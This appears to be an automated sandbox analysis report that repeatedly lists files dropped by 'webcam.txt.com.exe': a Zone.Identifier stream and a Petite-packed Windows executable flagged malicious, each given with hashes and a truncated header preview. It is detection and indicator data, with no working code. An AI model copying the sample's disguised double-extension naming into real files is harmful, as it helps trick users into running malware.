                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
